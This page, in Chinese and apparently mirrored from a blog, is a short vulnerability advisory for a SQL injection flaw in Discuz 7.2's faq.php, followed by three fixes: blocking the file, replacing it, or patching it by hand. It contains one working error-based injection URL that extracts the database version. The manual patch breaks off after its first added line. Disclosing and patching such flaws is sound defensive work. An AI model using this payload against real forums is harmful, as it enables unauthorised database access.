zoukankan      html  css  js  c++  java
  • Discuz 7.2 /faq.php SQL注入漏洞

    测试方法:

    提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
     
    Discuz 7.2 /faq.php SQL注入漏洞
     
    http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
     
     修复方法:
     

    修复文件: faq.php

    修复方法(一)
    此文件为显示论坛帮助用的,功能相对独立,您可以在服务器禁止该文件的访问,或者直接删除他。对论坛常规功能没有任何影响。

    修复方法(二)
    可以使用本贴中的附件覆盖您的旧文件

    修复方法(三)
    手工修复faq.php
    用编辑器打开该文件


    查找代码:

     } elseif($action == 'grouppermission') {
     
    在下面添加:
    $gids = array();
     
  • 相关阅读:
    ajax01
    django04
    数据库
    WeakHashMap类
    IdentityHashMap
    Hashtable类
    LinkedHashMap类
    HashMap和TreeMap类
    PriorityQueue
    Synchronized
  • 原文地址:https://www.cnblogs.com/security4399/p/3820110.html
Copyright © 2011-2022 走看看